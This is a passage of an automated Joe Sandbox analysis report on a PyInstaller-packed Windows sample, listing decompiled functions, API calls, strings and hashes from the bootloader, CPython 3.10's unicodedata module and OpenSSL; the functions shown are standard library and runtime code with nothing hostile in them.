_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD7437F1

Strings

str, xrefs: 00007FFCFD7437E3
argument 2, xrefs: 00007FFCFD7437D3
argument 1, xrefs: 00007FFCFD7437DC
normalize, xrefs: 00007FFCFD74368A, 00007FFCFD7437EA
invalid normalization form, xrefs: 00007FFCFD7437BD

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Unicode_$Equal$Arg_Ready$ArgumentCheckMallocMem_PositionalSubtypeType_
String ID: argument 1$argument 2$invalid normalization form$normalize$str
API String ID: 3079088272-4140678229
Opcode ID: b63d4111027b7d17c78fc4b47aaa094f50196fe0255e735cc8f8d6f37343e932
Instruction ID: cefe3e2f1be260d5d0f306ed315a9493a6f904417fdf9480a40ed6aae12578a6
Opcode Fuzzy Hash: b63d4111027b7d17c78fc4b47aaa094f50196fe0255e735cc8f8d6f37343e932
Instruction Fuzzy Hash: 83817022B0CD6AC2E7569B11957427A9391AB47BC6F444132CD6E8B7D9EF2CE405C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D1440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8D1440(void* __rcx, void* __rdx) {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t5;
				void* _t9;
				void* _t10;

				_t1 = E00007FF77FF7DA8D6700(_t2, _t3, _t5, __rcx, _t9, _t10);
				if (_t1 != 0xffffffff) goto 0xda8d1462;
				return _t1;
			}

0x7ff7da8d144f
0x7ff7da8d1457
0x7ff7da8d1461

Strings

malloc, xrefs: 00007FF7DA8D1560
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7DA8D1559
Failed to extract %s: failed to open target file!, xrefs: 00007FF7DA8D148A
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7DA8D14F9
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7DA8D15D5
fread, xrefs: 00007FF7DA8D15EC
fopen, xrefs: 00007FF7DA8D1491
fwrite, xrefs: 00007FF7DA8D15DC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7DA8D14CA
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7DA8D15E5
fseek, xrefs: 00007FF7DA8D1500

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 0-666925554
Opcode ID: 7c7598d907cee43c6658e5eb2dfbf4729ddd728a7e7388d800a6779307cb86a5
Instruction ID: f6d685693745667565604d7d7fa85439620feabb7355ab393b37040e73eb1ef2
Opcode Fuzzy Hash: 7c7598d907cee43c6658e5eb2dfbf4729ddd728a7e7388d800a6779307cb86a5
Instruction Fuzzy Hash: BE518A61B0864389FE12BB11E4006BDE361BF55BA4FC849B3DE1D476D7EE2CE5658320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7810 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00007FF7DA8D683A,?,00007FF7DA8D672D), ref: 00007FF7DA8D7850
OpenProcessToken.ADVAPI32(?,00007FF7DA8D672D), ref: 00007FF7DA8D7861
GetTokenInformation.ADVAPI32(?,00007FF7DA8D672D(TokenIntegrityLevel)), ref: 00007FF7DA8D7883
GetLastError.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7DA8D788D
GetTokenInformation.ADVAPI32(?,TokenIntegrityLevel), ref: 00007FF7DA8D78CA
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7DA8D78DC
CloseHandle.KERNEL32(?,00007FF7DA8D672D), ref: 00007FF7DA8D78F4
LocalFree.KERNEL32(?,00007FF7DA8D672D), ref: 00007FF7DA8D7926
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF7DA8D794D
CreateDirectoryW.KERNEL32(?,00007FF7DA8D672D), ref: 00007FF7DA8D795E

Strings

D:(A;;FA;;;%s), xrefs: 00007FF7DA8D7909
S-1-3-4, xrefs: 00007FF7DA8D78FF

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
String ID: D:(A;;FA;;;%s)$S-1-3-4
API String ID: 4998090-2855260032
Opcode ID: d0c6fb5d8e54c5899a9c51486ee6963a26b33c11755b1a587f1fa762aeef9303
Instruction ID: d8a93cd9a32f860a230678db6524784bf4b175b6c7ca4aa4eb55c35e39090a53
Opcode Fuzzy Hash: d0c6fb5d8e54c5899a9c51486ee6963a26b33c11755b1a587f1fa762aeef9303
Instruction Fuzzy Hash: 45417131A1868386FA11AF10E4446AEF360FB847A4FC40672EE5E47696DF3CE559C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD742560 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

PyModule_AddStringConstant.PYTHON310 ref: 00007FFCFD742580
PyType_FromSpec.PYTHON310 ref: 00007FFCFD742595
PyModule_AddType.PYTHON310 ref: 00007FFCFD7425AD
_Py_Dealloc.PYTHON310 ref: 00007FFCFD743F5B

Part of subcall function 00007FFCFD742640: _PyObject_GC_New.PYTHON310(?,?,00000000,00007FFCFD7425C3), ref: 00007FFCFD742646
Part of subcall function 00007FFCFD742640: PyObject_GC_Track.PYTHON310(?,?,00000000,00007FFCFD7425C3), ref: 00007FFCFD742678

PyModule_AddObject.PYTHON310 ref: 00007FFCFD7425E2
PyModule_AddObjectRef.PYTHON310 ref: 00007FFCFD74260A
_Py_Dealloc.PYTHON310 ref: 00007FFCFD743F6A
_Py_Dealloc.PYTHON310 ref: 00007FFCFD743F88

Part of subcall function 00007FFCFD7426B0: PyMem_Malloc.PYTHON310(?,?,00000000,00007FFCFD7425F5), ref: 00007FFCFD7426BB
Part of subcall function 00007FFCFD7426B0: PyCapsule_New.PYTHON310(?,?,00000000,00007FFCFD7425F5), ref: 00007FFCFD7426F8

Strings

13.0.0, xrefs: 00007FFCFD74256F
unidata_version, xrefs: 00007FFCFD742579
ucd_3_2_0, xrefs: 00007FFCFD7425D8
_ucnhash_CAPI, xrefs: 00007FFCFD742600

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Module_$Dealloc$ObjectObject_$Capsule_ConstantFromMallocMem_SpecStringTrackTypeType_
String ID: 13.0.0$_ucnhash_CAPI$ucd_3_2_0$unidata_version
API String ID: 288921926-2302946913
Opcode ID: 62d4d3cd799c6d8f812ed8f617823c366c006b3cb356fa84011d219d302020c9
Instruction ID: ece9fc0a1c08607649323707bf24e84b81b571e692a53376c37dc68c58c7ad30
Opcode Fuzzy Hash: 62d4d3cd799c6d8f812ed8f617823c366c006b3cb356fa84011d219d302020c9
Instruction Fuzzy Hash: 23214320A0CE2AC1F7165B2199301B992A16F4BBD7B044032D92E4EADDFF2DE015C3B1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D2030 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7DA8D205B
SelectObject.GDI32 ref: 00007FF7DA8D20A2
DrawTextW.USER32 ref: 00007FF7DA8D20C5
SelectObject.GDI32 ref: 00007FF7DA8D20DB
ReleaseDC.USER32 ref: 00007FF7DA8D20EB
MoveWindow.USER32 ref: 00007FF7DA8D213B
MoveWindow.USER32 ref: 00007FF7DA8D217B
MoveWindow.USER32 ref: 00007FF7DA8D21CE
MoveWindow.USER32 ref: 00007FF7DA8D2216

Strings

P%, xrefs: 00007FF7DA8D20AF

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: fb783cecea5857337ba39d7124ac847fd36298f9395065b285019c6a8496f5b4
Instruction ID: a6a84a6cd2b555526f19eabae1f6dcb3cf9e0259ba094f8f78632e3960c0bb38
Opcode Fuzzy Hash: fb783cecea5857337ba39d7124ac847fd36298f9395065b285019c6a8496f5b4
Instruction Fuzzy Hash: B551E7266047A286E624AF26A4581BEF7A1F798B61F404126EFCE43685DF3CD055DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD744790 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON310 ref: 00007FFCFD7447C3
_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD7447F8
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD74480B
_PyUnicode_ToDigit.PYTHON310 ref: 00007FFCFD7448A9
PyErr_SetString.PYTHON310 ref: 00007FFCFD7448C9
PyLong_FromLong.PYTHON310 ref: 00007FFCFD7448DD

Strings

digit, xrefs: 00007FFCFD7447BC, 00007FFCFD7447EA
argument 1, xrefs: 00007FFCFD7447F1
a unicode character, xrefs: 00007FFCFD7447E3
not a digit, xrefs: 00007FFCFD7448BF

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Arg_Unicode_$ArgumentCheckDigitErr_FromLongLong_PositionalReadyString
String ID: a unicode character$argument 1$digit$not a digit
API String ID: 2437920334-4278345224
Opcode ID: b820c1ba8c6851b758e757bda2ac652b098334cf85ab0b0fcac95edf73979230
Instruction ID: 6f7c8530d37a081c69430b1ec6efe0d34fc644a9717d1cd218ff65807a3dcf71
Opcode Fuzzy Hash: b820c1ba8c6851b758e757bda2ac652b098334cf85ab0b0fcac95edf73979230
Instruction Fuzzy Hash: 1F41B621B08A7AC1EB514B16D46027DA355AB42B8AF548433CA2D4B6DCFF7DE846D3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD7427C0 Relevance: 16.7, APIs: 11, Instructions: 230
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFC7FFCFD7427C0(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0xfd742801;
				if (_t5 == 0) goto 0xfd7427f5;
				if (_t5 == 0) goto 0xfd7427e8;
				if (__edx == 1) goto 0xfd7427e1;
				return 1;
			}

0x7ffcfd7427c4
0x7ffcfd7427c6
0x7ffcfd7427cb
0x7ffcfd7427d0
0x7ffcfd7427d5
0x7ffcfd7427e0

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFCFD7427E8
__scrt_initialize_crt.LIBCMT ref: 00007FFCFD74282D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFCFD74283A
_RTC_Initialize.LIBCMT ref: 00007FFCFD742868
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFCFD74288E
__scrt_release_startup_lock.LIBCMT ref: 00007FFCFD7428B9

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 4d981778426152582bd2bcf391e0cfb6d03b1f255c64df104127e21353c62d29
Instruction ID: 5f135dae12b2561f2002accd657a43506dbbd9c6c74b4d8e5631c94200d941d3
Opcode Fuzzy Hash: 4d981778426152582bd2bcf391e0cfb6d03b1f255c64df104127e21353c62d29
Instruction Fuzzy Hash: C781C221E0CA6BC6F752AB259461279E290AF47782F044136DD2C4B3DEFE3EE455C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD744B48 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD744B75
_PyUnicode_EqualToASCIIId.PYTHON310 ref: 00007FFCFD744BA7
PyUnicode_Compare.PYTHON310 ref: 00007FFCFD744C0A
_Py_Dealloc.PYTHON310 ref: 00007FFCFD744C1B
_PyUnicode_EqualToASCIIId.PYTHON310 ref: 00007FFCFD744C2F
_PyUnicode_EqualToASCIIId.PYTHON310 ref: 00007FFCFD744C4F
_PyUnicode_EqualToASCIIId.PYTHON310 ref: 00007FFCFD744C67
PyErr_SetString.PYTHON310 ref: 00007FFCFD744C8A

Strings

invalid normalization form, xrefs: 00007FFCFD744C80

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Unicode_$Equal$CompareDeallocErr_ReadyString
String ID: invalid normalization form
API String ID: 3010910608-2281882113
Opcode ID: ae959eb8062849ddf2a1372eaa62b4ea46895b67077d31a1475f2e7a558b5720
Instruction ID: 54d372728d8f9dc739bb23afa427402b4286387e680641f6f0ab9df6c349a3cc
Opcode Fuzzy Hash: ae959eb8062849ddf2a1372eaa62b4ea46895b67077d31a1475f2e7a558b5720
Instruction Fuzzy Hash: 42415421A08E6AC5EB518B12A960279A350BB46B8AF444537CD6E4B7DCFF6CE044D3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD744A5C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 58COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON310 ref: 00007FFCFD744A88
_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD744ABD
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD744ACD
_PyArg_BadArgument.PYTHON310 ref: 00007FFCFD744B0C
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD744B1C

Strings

str, xrefs: 00007FFCFD744AA8, 00007FFCFD744AF7
argument 2, xrefs: 00007FFCFD744B05
argument 1, xrefs: 00007FFCFD744AB6
is_normalized, xrefs: 00007FFCFD744A7B, 00007FFCFD744AAF, 00007FFCFD744AFE

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Arg_$ArgumentReadyUnicode_$CheckPositional
String ID: argument 1$argument 2$is_normalized$str
API String ID: 396090033-184702317
Opcode ID: d7c17ebadb723ea09846ba8eb28a19efd5a53d34ba05390ff0baa6aee06a10f7
Instruction ID: be399e38c5070405910c66f33b39e0ac4426ee4abb73a06d184c43b5bc6acd69
Opcode Fuzzy Hash: d7c17ebadb723ea09846ba8eb28a19efd5a53d34ba05390ff0baa6aee06a10f7
Instruction Fuzzy Hash: 07218020A08E6A81E7518B16E4602B9A360EF46B9AF444533D97D0B2ECEF6CD405D3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7420 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF7DA8D26A0), ref: 00007FF7DA8D7447
FormatMessageW.KERNEL32(00000000,00007FF7DA8D26A0), ref: 00007FF7DA8D7476
WideCharToMultiByte.KERNEL32 ref: 00007FF7DA8D74CC

Part of subcall function 00007FF7DA8D2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7DA8D76B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D2654
Part of subcall function 00007FF7DA8D2620: MessageBoxW.USER32 ref: 00007FF7DA8D272C

Strings

WideCharToMultiByte, xrefs: 00007FF7DA8D74DD
FormatMessageW, xrefs: 00007FF7DA8D7487
No error messages generated., xrefs: 00007FF7DA8D7480
PyInstaller: FormatMessageW failed., xrefs: 00007FF7DA8D7493
PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF7DA8D74E9
Failed to encode wchar_t as UTF-8., xrefs: 00007FF7DA8D74D6

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorLastMessage$ByteCharFormatMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2920928814-2573406579
Opcode ID: bd063840465bb7cc99fd3a25d537acc863a05dd4e60a717c5e3fbe49c0d7532d
Instruction ID: 5a7c27fef208a1a9cff3b26512da5d08b443e15766ce1ddde922e919ffc0e07c
Opcode Fuzzy Hash: bd063840465bb7cc99fd3a25d537acc863a05dd4e60a717c5e3fbe49c0d7532d
Instruction Fuzzy Hash: 91217171A08A4385FB62BF11E84026DEB61BF98384FC40076D94D826A6EF3CD169C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD864B3D Relevance: 15.1, APIs: 3, Strings: 7, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA934DD
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA93540
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA9356F

Strings

..\s\crypto\x509v3\v3_conf.c, xrefs: 00007FFCFDA93600
, value=, xrefs: 00007FFCFDA93613
ASN1:, xrefs: 00007FFCFDA93565
critical,, xrefs: 00007FFCFDA934D6
DER:, xrefs: 00007FFCFDA93536
/, xrefs: 00007FFCFDA935F8
name=, xrefs: 00007FFCFDA93622

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: strncmp
String ID: , value=$..\s\crypto\x509v3\v3_conf.c$/$ASN1:$DER:$critical,$name=
API String ID: 1114863663-1429737502
Opcode ID: 7f2ca93d11da1ca7a80ac0ee73faedd964ac5519fcad5655242ec72a9e8b707f
Instruction ID: 4264e210c6b99ced43f6c15d774ccbaea242d969f20bf84d6a798fbee3e3a8ba
Opcode Fuzzy Hash: 7f2ca93d11da1ca7a80ac0ee73faedd964ac5519fcad5655242ec72a9e8b707f
